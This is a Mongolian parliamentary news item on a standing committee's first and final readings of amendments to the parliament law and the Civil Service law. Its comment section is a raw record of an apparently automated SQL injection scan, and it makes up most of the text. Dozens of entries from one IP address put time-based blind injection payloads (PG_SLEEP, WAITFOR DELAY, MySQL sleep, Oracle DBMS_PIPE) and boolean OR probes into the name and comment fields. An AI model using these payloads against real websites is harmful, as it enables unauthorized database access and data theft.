Төрийн байгуулалтын байнгын хороо хуулийн төслүүдийн анхны болон эцсийн хэлэлцүүлгийг явууллаа

Aдмин / Хууль

УИХ-ын Төрийн байгуулалтын байнгын хороо өнөөдөр /2022.07.05/ хуралдан Монгол Улсын Их Хурлын тухай хуульд нэмэлт оруулах тухай хуулийн төсөл болон хамт өргөн мэдүүлсэн хуулийн төслийн анхны хэлэлцүүлгийг хийлээ.

Хуулийн төслийн хэлэлцүүлгийг явуулах үед төслийн талаар зарчмын зөрүүтэй саналын томьёолол гараагүй тул УИХ-ын гишүүн Д.Тогтохсүрэн Монгол Улсын Их Хурлын чуулганы хуралдааны дэгийн тухай хуулийн 39 дүгээр зүйлийн 39.22 дахь хэсэгт заасны дагуу хуулийн төслийн анхны хэлэлцүүлгийг эцэслэн батлах үе шаттай нэгтгэн явуулах горимын санал гаргасныг хуралдаанд оролцсон гишүүдийн дийлэнх олонх дэмжив. Ингээд Байнгын хорооны санал, дүгнэлтийг чуулганы нэгдсэн хуралдаанд танилцуулахаар тогтов.

Мөн хуралдаанаар Төрийн албаны тухай хуульд нэмэлт, өөрчлөлт оруулах тухай хуулийн нэгтгэсэн төсөл болон хамт өргөн мэдүүлсэн хуулийн төслүүдийн анхны хэлэлцүүлгийг явууллаа.

Төрийн байгуулалтын байнгын хороо 2022 оны 06 дугаар сарын 29-ний өдрийн хуралдаанаараа дээрх хууль, тогтоолын төслийн анхны хэлэлцүүлгийг хийж, Ажлын хэсгийн дэмжсэн 18 зарчмын зөрүүтэй саналын томьёоллыг нэг бүрчлэн хэлэлцэн, санал хураалт явуулж олонхын санал авсан зарчмын зөрүүтэй саналын томьёолол болон анхны хэлэлцүүлэг явуулсан талаарх Байнгын хорооны санал, дүгнэлтийг хэлэлцүүлэхээр чуулганы нэгдсэн хуралдаанд оруулсан.

Улсын Их Хурал дахь Монгол Ардын намын бүлэг уг асуудлаар 2022 оны 07 дугаар сарын 01-ний өдрөөс 2 өдрийн завсарлагыг чуулганы нэгдсэн хуралдаанаас авсан бөгөөд Улсын Их Хурлын 2022 оны 07 дугаар сарын 05-ны өдрийн чуулганы нэгдсэн хуралдаанаар хуулийн төслийн анхны хэлэлцүүлгийг үргэлжлүүлэн явуулах үед УИХ-ын гишүүн Г.Тэмүүлэн нарын гурван гишүүнээс 2021 оны 05 дугаар сарын 21-ний өдөр Улсын Их Хуралд өргөн мэдүүлсэн Төрийн албаны тухай хуульд нэмэлт, өөрчлөлт оруулах тухай хуулийн төсөл болон хамт өргөн мэдүүлсэн хуулийн төслүүдийг тусад нь хэлэлцэх нь зүйтэй гэж үзэн Монгол Улсын Их Хурлын чуулганы хуралдааны дэгийн тухай хуульд заасны дагуу хуулийн төслийн анхны хэлэлцүүлгийг дахин явуулах шаардлагатай гэж хуралдаанд оролцсон гишүүдийн олонх үзсэн тул бол хуулийн төслийг Байнгын хороонд буцаасан юм.

Төрийн байгуулалтын байнгын хороо энэ өдрийн хуралдаанаараа дээрх хуулийн төслүүдийн анхны хэлэлцүүлгийг Монгол Улсын Их Хурлын чуулганы хуралдааны дэгийн тухай хуулийн 39 дүгээр зүйлд заасан журмын дагуу дахин явуулав.

Байнгын хороо 2022 оны 06 дугаар сарын 29-ний өдрийн хуралдаанаар дэмжсэн 18 зарчмын зөрүүтэй саналыг хүчингүй болгох, Монгол Улсын Засгийн газраас өргөн мэдүүлсэн Төрийн албаны тухай хуульд нэмэлт, өөрчлөлт оруулах тухай хуулийн төсөл болон УИХ-ын гишүүн Ё.Баатарбилэгээс 2021 оны 07 дугаар сарын 05-ны өдөр Улсын Их Хуралд өргөн мэдүүлсэн Төрийн албаны тухай хуульд нэмэлт, өөрчлөлт оруулах тухай хуулийн төсөл болон хамт өргөн мэдүүлсэн хуулийн төслийг нэгтгэн хэлэлцэх горимын санал гаргасныг Байнгын хорооны хуралдаанд оролцсон гишүүдийн олонх дэмжив.

Мөн ажлын хэсгээс боловсруулсан төрийн албанд 1 жил хүртэл хугацаагаар гэрээгээр ажиллуулж болох, зарим олон улсын байгууллага болон төрийн чиг үүргийг хэрэгжүүлэхээр хуулиар байгуулагдсан нийтийн эрх зүйн этгээдэд ажилласан иргэний тухайн байгууллагад ажилласан хугацааг төрийн албанд ажилласан хугацаанд дүйцүүлэн тооцох зохицуулалтыг хасах зэрэг нийт 10 зарчмын зөрүүтэй саналыг хуралдаанд оролцсон гишүүдийн олонх дэмжлээ.

УИХ-ын гишүүн Б.Энхбаяр хуулийн төсөлтэй хамт өргөн мэдүүлсэн Нийтийн албанд нийтийн болон хувийн ашиг сонирхлыг зохицуулах, ашиг сонирхлын зөрчлөөс урьдчилан сэргийлэх тухай хуульд нэмэлт оруулах тухай хуулийн төсөлтэй холбогдуулан Авлигатай тэмцэх газар нийтийн албанд томилогдохоор нэр дэвшсэн этгээдийн хувийн ашиг сонирхлын урьдчилсан мэдүүлгийг хянан үзэхдээ тухайн албан үүргийг хэрэгжүүлэхэд ашиг сонирхлын зөрчил үүсэх эсэх талаар томилох эрх бүхий байгууллага, албан тушаалтанд мэдэгдэхээс бусад асуудлаар дүгнэлт, мэдэгдэл гаргахыг хориглох болон Төрийн албаны тухай хуулийн 10 дугаар зүйлийн 10.1.1-д заасан албан тушаалд томилогдохоор нэр дэвшсэн этгээдэд мэдэгдэл гаргахгүй байх талаар санал гаргасныг хуралдаанд оролцсон гишүүдийн олонх дэмжлээ. Ингээд Байнгын хорооны санал, дүгнэлтийг чуулганы нэгдсэн хуралдаанд танилцуулахаар тогтов.

Тус байнгын хороо чуулганы нэгдсэн хуралдаанаар Төрийн албаны тухай хуульд нэмэлт, өөрчлөлт оруулах тухай хуулийн нэгтгэсэн төсөл болон хамт өргөн мэдүүлсэн хуулийн төслүүдийн анхны хэлэлцүүлгийг хийсний дараа дахин хуралдаж дээрх хуулийн төслийн эцсийн хэлэлцүүлгийг хийсэн юм.

Байнгын хороо нэгдсэн хуралдааны анхны хэлэлцүүлгээр олонхын дэмжлэг авсан саналыг хуулийн төслийн холбогдох зүйл, хэсэг, заалтад нэмж тусган төслийн агуулга, зарчмыг алдагдуулахгүйгээр үг хэллэг, дэс дараалал, бүтцийн шинжтэй засварыг хийж, эцсийн хэлэлцүүлэгт бэлтгэсэн талаарх танилцуулгыг чуулганы нэгдсэн хуралдаанд танилцуулахаар тогтлоо хэмээн УИХ-ын Хэвлэл мэдээлэл, олон нийттэй харилцах хэлтсээс мэдээллээ.


Сэтгэгдэл

pHqghUme [196.196.203.214] 2022-07-07 19:09:35

1

pHqghUme [196.196.203.214] 2022-07-07 19:09:34

1

pHqghUme [196.196.203.214] 2022-07-07 19:09:31

1

pHqghUme [196.196.203.214] 2022-07-07 19:09:31

1

pHqghUme [196.196.203.214] 2022-07-07 19:09:30

1

Зочин [196.196.203.214] 2022-07-07 19:09:23

Зочин [196.196.203.214] 2022-07-07 19:09:23

Зочин [196.196.203.214] 2022-07-07 12:09:17

Зочин [196.196.203.214] 2022-07-07 12:09:17

pHqghUme [196.196.203.214] 2022-07-07 12:09:17

1

pHqghUme [196.196.203.214] 2022-07-07 10:26:47

555

pHqghUme [196.196.203.214] 2022-07-07 10:26:31

555

pHqghUme [196.196.203.214] 2022-07-07 10:05:30

1

pHqghUme [196.196.203.214] 2022-07-07 10:05:30

1

pHqghUme [196.196.203.214] 2022-07-07 10:05:26

1

pHqghUme [196.196.203.214] 2022-07-07 10:05:26

1

pHqghUme [196.196.203.214] 2022-07-07 10:05:26

1

Зочин [196.196.203.214] 2022-07-07 10:05:22

Зочин [196.196.203.214] 2022-07-07 10:05:22

pHqghUme [196.196.203.214] 2022-07-07 10:02:39

555

pHqghUme [196.196.203.214] 2022-07-07 10:02:24

555

Зочин [@@28gkS] 2022-07-07 09:16:37

Зочин [1] 2022-07-07 09:16:37

Зочин [1'"] 2022-07-07 09:16:36

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-07 09:16:36

Зочин [ZfwNXBJn')) OR 236=(SELECT 236 FROM PG_SLEEP(15))--] 2022-07-07 09:16:22

Зочин [wgI4Ncop') OR 373=(SELECT 373 FROM PG_SLEEP(15))--] 2022-07-07 09:16:09

Зочин [gXiqvatP' OR 70=(SELECT 70 FROM PG_SLEEP(15))--] 2022-07-07 09:15:54

Зочин [SAinrtZI'; waitfor delay '0:0:15' -- ] 2022-07-07 09:15:41

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-07 09:15:26

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-07 09:15:12

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-07 09:14:57

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-07 09:14:42

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-07 09:14:27

Зочин [-1" OR 2+447-447-1=0+0+0+1 -- ] 2022-07-07 09:14:14

Зочин [-1' OR 2+309-309-1=0+0+0+1 or 'xhcm2B1e'='] 2022-07-07 09:14:14

Зочин [-1' OR 2+730-730-1=0+0+0+1 -- ] 2022-07-07 09:14:13

Зочин [-1 OR 2+421-421-1=0+0+0+1] 2022-07-07 09:14:13

Зочин [-1 OR 2+642-642-1=0+0+0+1 -- ] 2022-07-07 09:14:12

Зочин [gxBqQPV2] 2022-07-07 09:14:12

Зочин [@@gq23B] 2022-07-07 09:14:01

Зочин [1] 2022-07-07 09:14:00

Зочин [1'"] 2022-07-07 09:14:00

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-07 09:13:59

Зочин [196.196.203.214] 2022-07-07 09:13:55

Зочин [UN1iOrzo')) OR 281=(SELECT 281 FROM PG_SLEEP(15))--] 2022-07-07 09:13:45

Зочин [196.196.203.214] 2022-07-07 09:13:42

Зочин [YHRiGIxx') OR 525=(SELECT 525 FROM PG_SLEEP(15))--] 2022-07-07 09:13:31

Зочин [196.196.203.214] 2022-07-07 09:13:28

Зочин [196.196.203.214] 2022-07-07 09:13:27

Зочин [mVRFb021' OR 24=(SELECT 24 FROM PG_SLEEP(15))--] 2022-07-07 09:13:18

Зочин [196.196.203.214] 2022-07-07 09:13:13

Зочин [CS9ibCBG'; waitfor delay '0:0:15' -- ] 2022-07-07 09:13:03

Зочин [196.196.203.214] 2022-07-07 09:12:59

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-07 09:12:50

Зочин [196.196.203.214] 2022-07-07 09:12:46

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-07 09:12:37

Зочин [196.196.203.214] 2022-07-07 09:12:32

pHqghUme [@@RJIp1] 2022-07-07 09:12:31

1

pHqghUme [1] 2022-07-07 09:12:31

1

pHqghUme [1'"] 2022-07-07 09:12:31

1

pHqghUme [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-07 09:12:30

1

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-07 09:12:24

Зочин [196.196.203.214] 2022-07-07 09:12:19

pHqghUme [KK6hGBV6')) OR 844=(SELECT 844 FROM PG_SLEEP(15))--] 2022-07-07 09:12:17

1

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-07 09:12:10

Зочин [196.196.203.214] 2022-07-07 09:12:06

pHqghUme [s0vEvaqX') OR 481=(SELECT 481 FROM PG_SLEEP(15))--] 2022-07-07 09:12:04

1

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-07 09:11:56

Зочин [196.196.203.214] 2022-07-07 09:11:51

pHqghUme [dCTY112N' OR 371=(SELECT 371 FROM PG_SLEEP(15))--] 2022-07-07 09:11:50

1

Зочин [-1" OR 2+807-807-1=0+0+0+1 -- ] 2022-07-07 09:11:44

Зочин [-1' OR 2+425-425-1=0+0+0+1 or 'RbkRq5AH'='] 2022-07-07 09:11:43

Зочин [-1' OR 2+787-787-1=0+0+0+1 -- ] 2022-07-07 09:11:43

Зочин [-1 OR 2+823-823-1=0+0+0+1] 2022-07-07 09:11:42

Зочин [-1 OR 2+853-853-1=0+0+0+1 -- ] 2022-07-07 09:11:42

Зочин [1rDcZbZw] 2022-07-07 09:11:42

Зочин [196.196.203.214] 2022-07-07 09:11:37

pHqghUme [El3GZLU0'; waitfor delay '0:0:15' -- ] 2022-07-07 09:11:36

1

Зочин [196.196.203.214] 2022-07-07 09:11:26

pHqghUme [1 waitfor delay '0:0:15' -- ] 2022-07-07 09:11:22

1

Зочин [196.196.203.214] 2022-07-07 09:11:14

Зочин [196.196.203.214] 2022-07-07 09:11:10

pHqghUme [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-07 09:11:09

1

Зочин [196.196.203.214] 2022-07-07 09:10:59

Зочин [196.196.203.214] 2022-07-07 09:10:57

pHqghUme [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-07 09:10:56

1

Зочин [196.196.203.214] 2022-07-07 09:10:46

Зочин [196.196.203.214] 2022-07-07 09:10:43

pHqghUme [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-07 09:10:42

1

Зочин [196.196.203.214] 2022-07-07 09:10:29

pHqghUme [if(now()=sysdate(),sleep(15),0)] 2022-07-07 09:10:27

1

Зочин [196.196.203.214] 2022-07-07 09:10:16

pHqghUme [-1" OR 2+150-150-1=0+0+0+1 -- ] 2022-07-07 09:10:14

1

pHqghUme [-1' OR 2+925-925-1=0+0+0+1 or 'a5sqDIHK'='] 2022-07-07 09:10:14

1

pHqghUme [-1' OR 2+303-303-1=0+0+0+1 -- ] 2022-07-07 09:10:13

1

pHqghUme [-1 OR 2+730-730-1=0+0+0+1] 2022-07-07 09:10:13

1

pHqghUme [-1 OR 2+251-251-1=0+0+0+1 -- ] 2022-07-07 09:10:12

1

pHqghUme [xI7fr3yd] 2022-07-07 09:10:12

1

Зочин [196.196.203.214] 2022-07-07 09:10:03

pHqghUme [196.196.203.214] 2022-07-07 09:10:00

1

Зочин [196.196.203.214] 2022-07-07 09:09:50

Зочин [196.196.203.214] 2022-07-07 09:09:50

Зочин [196.196.203.214] 2022-07-07 09:09:49

Зочин [196.196.203.214] 2022-07-07 09:09:49

Зочин [196.196.203.214] 2022-07-07 09:09:48

Зочин [196.196.203.214] 2022-07-07 09:09:48

pHqghUme [196.196.203.214] 2022-07-07 09:09:46

1

Зочин [196.196.203.214] 2022-07-07 09:09:35

pHqghUme [196.196.203.214] 2022-07-07 09:09:32

1

Зочин [196.196.203.214] 2022-07-07 09:09:21

pHqghUme [196.196.203.214] 2022-07-07 09:09:19

1

Зочин [196.196.203.214] 2022-07-07 09:09:08

Зочин [196.196.203.214] 2022-07-07 09:08:55

Зочин [196.196.203.214] 2022-07-07 09:07:02

Зочин [196.196.203.214] 2022-07-07 09:06:48

Зочин [196.196.203.214] 2022-07-07 09:06:36

@@5LKnT

Зочин [196.196.203.214] 2022-07-07 09:06:36

1

Зочин [196.196.203.214] 2022-07-07 09:06:35

1'"

Зочин [196.196.203.214] 2022-07-07 09:06:35

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-07 09:06:21

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-07 09:06:07

nHg6rKpS')) OR 149=(SELECT 149 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:05:53

XDkD5P7v') OR 188=(SELECT 188 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:05:41

5FobpYbz' OR 257=(SELECT 257 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 09:05:30

1

Зочин [196.196.203.214] 2022-07-07 09:05:27

-1)) OR 551=(SELECT 551 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 09:05:16

1

Зочин [196.196.203.214] 2022-07-07 09:05:12

-5) OR 55=(SELECT 55 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:05:04

pHqghUme [196.196.203.214] 2022-07-07 09:05:02

@@ksYkv

pHqghUme [196.196.203.214] 2022-07-07 09:05:01

1

pHqghUme [196.196.203.214] 2022-07-07 09:05:01

1'"

pHqghUme [196.196.203.214] 2022-07-07 09:05:01

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-07 09:04:59

-5 OR 553=(SELECT 553 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:04:52

pHqghUme [196.196.203.214] 2022-07-07 09:04:48

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-07 09:04:47

FuYUFiF4'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 09:04:39

@@AckRb

Зочин [196.196.203.214] 2022-07-07 09:04:39

1

Зочин [196.196.203.214] 2022-07-07 09:04:38

1'"

Зочин [196.196.203.214] 2022-07-07 09:04:38

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

pHqghUme [196.196.203.214] 2022-07-07 09:04:35

RaRwYDWU')) OR 211=(SELECT 211 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:04:34

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 09:04:24

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

pHqghUme [196.196.203.214] 2022-07-07 09:04:21

Yd7giJHi') OR 867=(SELECT 867 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:04:20

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 09:04:09

nN77FC72')) OR 636=(SELECT 636 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 09:04:06

y9OKuFFH' OR 536=(SELECT 536 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:04:05

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 09:03:56

JS6dik0V') OR 896=(SELECT 896 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 09:03:52

-1)) OR 702=(SELECT 702 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:03:51

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Зочин [196.196.203.214] 2022-07-07 09:03:42

CcIWYjWZ' OR 572=(SELECT 572 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 09:03:39

-5) OR 723=(SELECT 723 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:03:38

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Зочин [196.196.203.214] 2022-07-07 09:03:29

-1)) OR 586=(SELECT 586 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 09:03:25

-5 OR 904=(SELECT 904 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-07 09:03:24

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Зочин [196.196.203.214] 2022-07-07 09:03:15

-5) OR 888=(SELECT 888 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 09:03:12

bvvtvkNd'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 09:03:11

if(now()=sysdate(),sleep(15),0)

Зочин [196.196.203.214] 2022-07-07 09:03:02

-5 OR 289=(SELECT 289 FROM PG_SLEEP(15))--

pHqghUme [196.196.203.214] 2022-07-07 09:02:57

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 09:02:56

-1" OR 2+932-932-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 09:02:55

-1' OR 2+557-557-1=0+0+0+1 or 'mcyPgiXt'='

Зочин [196.196.203.214] 2022-07-07 09:02:55

-1' OR 2+921-921-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 09:02:54

-1 OR 2+711-711-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-07 09:02:54

-1 OR 2+436-436-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 09:02:54

DEyjZHU6

Зочин [196.196.203.214] 2022-07-07 09:02:47

AZvVbubq'; waitfor delay '0:0:15' --

pHqghUme [196.196.203.214] 2022-07-07 09:02:42

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 09:02:38

1

Зочин [196.196.203.214] 2022-07-07 09:02:31

1 waitfor delay '0:0:15' --

pHqghUme [196.196.203.214] 2022-07-07 09:02:27

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-07 09:02:22

1

Зочин [196.196.203.214] 2022-07-07 09:02:16

-1); waitfor delay '0:0:15' --

pHqghUme [196.196.203.214] 2022-07-07 09:02:13

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

@@lQuky [196.196.203.214] 2022-07-07 09:02:09

1 [196.196.203.214] 2022-07-07 09:02:09

1'" [196.196.203.214] 2022-07-07 09:02:08

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-07 09:02:08

Зочин [196.196.203.214] 2022-07-07 09:02:02

-1; waitfor delay '0:0:15' --

pHqghUme [196.196.203.214] 2022-07-07 09:01:58

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-07 09:01:54

Зочин [196.196.203.214] 2022-07-07 09:01:48

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

pHqghUme [196.196.203.214] 2022-07-07 09:01:44

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

qFDQml6z')) OR 807=(SELECT 807 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 09:01:41

Зочин [196.196.203.214] 2022-07-07 09:01:35

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

pHqghUme [196.196.203.214] 2022-07-07 09:01:30

if(now()=sysdate(),sleep(15),0)

smfAYd7k') OR 911=(SELECT 911 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 09:01:28

Зочин [196.196.203.214] 2022-07-07 09:01:22

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

pHqghUme [196.196.203.214] 2022-07-07 09:01:16

-1" OR 2+361-361-1=0+0+0+1 --

pHqghUme [196.196.203.214] 2022-07-07 09:01:16

-1' OR 2+888-888-1=0+0+0+1 or 'IkSx7Wjt'='

pHqghUme [196.196.203.214] 2022-07-07 09:01:15

-1' OR 2+546-546-1=0+0+0+1 --

pHqghUme [196.196.203.214] 2022-07-07 09:01:15

-1 OR 2+859-859-1=0+0+0+1

pHqghUme [196.196.203.214] 2022-07-07 09:01:14

-1 OR 2+188-188-1=0+0+0+1 --

pHqghUme [196.196.203.214] 2022-07-07 09:01:14

F16wkDD6

i90uScjd' OR 995=(SELECT 995 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 09:01:13

Зочин [196.196.203.214] 2022-07-07 09:01:06

if(now()=sysdate(),sleep(15),0)

pHqghUme [196.196.203.214] 2022-07-07 09:00:57

1

-1)) OR 513=(SELECT 513 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 09:00:57

Зочин [196.196.203.214] 2022-07-07 09:00:51

-1" OR 2+384-384-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 09:00:51

-1' OR 2+452-452-1=0+0+0+1 or 'K4iHhAZa'='

Зочин [196.196.203.214] 2022-07-07 09:00:50

-1' OR 2+13-13-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 09:00:50

-1 OR 2+130-130-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-07 09:00:50

-1 OR 2+612-612-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-07 09:00:49

qcUMoihc

pHqghUme [196.196.203.214] 2022-07-07 09:00:45

1

-5) OR 467=(SELECT 467 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 09:00:44

Зочин [196.196.203.214] 2022-07-07 09:00:37

1

@@f3wH9 [196.196.203.214] 2022-07-07 09:00:31

1

-5 OR 30=(SELECT 30 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 09:00:31

1 [196.196.203.214] 2022-07-07 09:00:31

1

1'" [196.196.203.214] 2022-07-07 09:00:30

1

pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-07 09:00:30

1

Зочин [196.196.203.214] 2022-07-07 09:00:23

1

Lpeg6Jmp'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 09:00:18

tmZkx0Mh')) OR 993=(SELECT 993 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 09:00:17

1

@@ONile [196.196.203.214] 2022-07-07 09:00:11

1 [196.196.203.214] 2022-07-07 09:00:10

1'" [196.196.203.214] 2022-07-07 09:00:10

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-07 09:00:09

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 09:00:05

f2x4x5Ob') OR 979=(SELECT 979 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 09:00:04

1

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-07 08:59:57

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 08:59:52

8ACG4WNQ' OR 203=(SELECT 203 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 08:59:51

1

sgMMrjqz')) OR 225=(SELECT 225 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 08:59:44

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 08:59:39

tMrAfo97'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 08:59:38

1

VKWhZPOA') OR 300=(SELECT 300 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 08:59:30

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-07 08:59:25

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 08:59:24

1

0A3Blw8u' OR 957=(SELECT 957 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 08:59:17

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-07 08:59:11

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-07 08:59:11

1

-1)) OR 27=(SELECT 27 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 08:59:03

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-07 08:58:58

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-07 08:58:58

1

-5) OR 747=(SELECT 747 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 08:58:51

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-07 08:58:45

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-07 08:58:45

1

-5 OR 285=(SELECT 285 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-07 08:58:38

-1" OR 2+348-348-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 08:58:33

-1' OR 2+893-893-1=0+0+0+1 or 'GfYwEUU0'=' [196.196.203.214] 2022-07-07 08:58:32

-1' OR 2+165-165-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 08:58:32

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-07 08:58:32

1

-1 OR 2+172-172-1=0+0+0+1 [196.196.203.214] 2022-07-07 08:58:31

-1 OR 2+421-421-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 08:58:31

gHy9V3PQ [196.196.203.214] 2022-07-07 08:58:30

3t2GiMJ8'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-07 08:58:25

-1" OR 2+564-564-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 08:58:18

1

-1' OR 2+732-732-1=0+0+0+1 or 'Yu7yDBf6'=' [196.196.203.214] 2022-07-07 08:58:17

1

-1' OR 2+342-342-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 08:58:17

1

-1 OR 2+944-944-1=0+0+0+1 [196.196.203.214] 2022-07-07 08:58:16

1

1 [196.196.203.214] 2022-07-07 08:58:16

-1 OR 2+34-34-1=0+0+0+1 -- [196.196.203.214] 2022-07-07 08:58:16

1

